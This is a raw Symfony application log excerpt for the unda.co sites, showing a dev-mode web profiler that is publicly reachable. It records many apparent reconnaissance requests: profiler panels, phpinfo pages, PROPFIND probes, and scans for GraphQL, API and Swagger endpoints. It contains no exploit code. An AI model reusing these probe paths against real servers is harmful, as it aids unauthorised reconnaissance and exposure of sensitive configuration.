  7320. [2025-12-20 15:02:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7321. [2025-12-20 15:02:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json" (from "http://web.unda.co/wp-json")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" (from \"http://web.unda.co/wp-json\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7322. [2025-12-20 15:02:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  7323. [2025-12-20 15:06:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7324. [2025-12-20 15:06:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2ce99c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2ce99c?panel=events","method":"GET"} []
  7325. [2025-12-20 15:06:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  7326. [2025-12-20 15:06:36] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"639e42","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/639e42","method":"GET"} []
  7327. [2025-12-20 15:10:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b38511","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b38511?panel=db","method":"GET"} []
  7328. [2025-12-20 15:10:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7329. [2025-12-20 15:12:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0","method":"GET"} []
  7330. [2025-12-20 15:12:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  7331. [2025-12-20 15:13:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  7332. [2025-12-20 15:21:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  7333. [2025-12-20 15:22:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7334. [2025-12-20 15:23:00] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"ac1601","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/ac1601","method":"GET"} []
  7335. [2025-12-20 15:25:24] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"006517","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/006517/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
  7336. [2025-12-20 15:25:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
  7337. [2025-12-20 15:26:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=validator","method":"GET"} []
  7338. [2025-12-20 15:26:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  7339. [2025-12-20 15:27:33] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5f0320","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/5f0320/search/results?ip=216.108.237.50&limit=10","method":"GET"} []
  7340. [2025-12-20 15:27:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.108.237.50&limit=10","method":"GET"} []
  7341. [2025-12-20 15:27:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=cache","method":"GET"} []
  7342. [2025-12-20 15:27:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7343. [2025-12-20 15:28:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"59964f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/59964f?panel=db","method":"GET"} []
  7344. [2025-12-20 15:28:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7345. [2025-12-20 15:30:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=twig","method":"GET"} []
  7346. [2025-12-20 15:30:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  7347. [2025-12-20 15:30:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=cache","method":"GET"} []
  7348. [2025-12-20 15:30:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7349. [2025-12-20 15:34:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7350. [2025-12-20 15:35:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=cache","method":"GET"} []
  7351. [2025-12-20 15:35:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7352. [2025-12-20 15:35:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ed5b89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ed5b89?panel=dump","method":"GET"} []
  7353. [2025-12-20 15:35:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  7354. [2025-12-20 15:37:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48ebd7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48ebd7?panel=db","method":"GET"} []
  7355. [2025-12-20 15:37:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7356. [2025-12-20 15:38:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=events","method":"GET"} []
  7357. [2025-12-20 15:38:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  7358. [2025-12-20 15:43:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7359. [2025-12-20 15:46:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0409e5","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/0409e5/search/results?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
  7360. [2025-12-20 15:46:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
  7361. [2025-12-20 15:48:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=time","method":"GET"} []
  7362. [2025-12-20 15:48:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7363. [2025-12-20 15:49:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7364. [2025-12-20 15:51:58] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7365. [2025-12-20 15:52:00] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  7366. [2025-12-20 15:53:55] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7367. [2025-12-20 15:53:56] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7368. [2025-12-20 15:56:19] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7369. [2025-12-20 15:56:19] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7370. [2025-12-20 15:56:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7371. [2025-12-20 15:56:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7372. [2025-12-20 15:56:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7373. [2025-12-20 15:56:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7374. [2025-12-20 15:56:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7375. [2025-12-20 15:56:19] security.DEBUG: Calling Authentication entry point. [] []
  7376. [2025-12-20 15:56:19] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  7377. [2025-12-20 15:56:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7378. [2025-12-20 15:56:20] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  7379. [2025-12-20 15:56:21] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  7380. [2025-12-20 15:56:22] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  7381. [2025-12-20 15:56:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7382. [2025-12-20 15:56:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7383. [2025-12-20 15:56:22] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7384. [2025-12-20 15:56:22] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7385. [2025-12-20 15:56:22] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7386. [2025-12-20 15:56:22] security.DEBUG: Calling Authentication entry point. [] []
  7387. [2025-12-20 15:56:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  7388. [2025-12-20 15:56:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7389. [2025-12-20 15:56:29] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7390. [2025-12-20 15:56:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7391. [2025-12-20 15:56:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7392. [2025-12-20 15:56:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7393. [2025-12-20 15:56:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7394. [2025-12-20 15:56:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7395. [2025-12-20 15:56:29] security.DEBUG: Calling Authentication entry point. [] []
  7396. [2025-12-20 15:56:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7397. [2025-12-20 15:56:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7398. [2025-12-20 15:57:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  7399. [2025-12-20 16:03:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=security","method":"GET"} []
  7400. [2025-12-20 16:03:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7401. [2025-12-20 16:05:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7402. [2025-12-20 16:08:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
  7403. [2025-12-20 16:08:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  7404. [2025-12-20 16:11:39] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7405. [2025-12-20 16:11:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7406. [2025-12-20 16:11:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7407. [2025-12-20 16:11:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7408. [2025-12-20 16:11:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7409. [2025-12-20 16:11:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7410. [2025-12-20 16:11:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7411. [2025-12-20 16:11:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7412. [2025-12-20 16:11:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7413. [2025-12-20 16:11:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7414. [2025-12-20 16:11:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
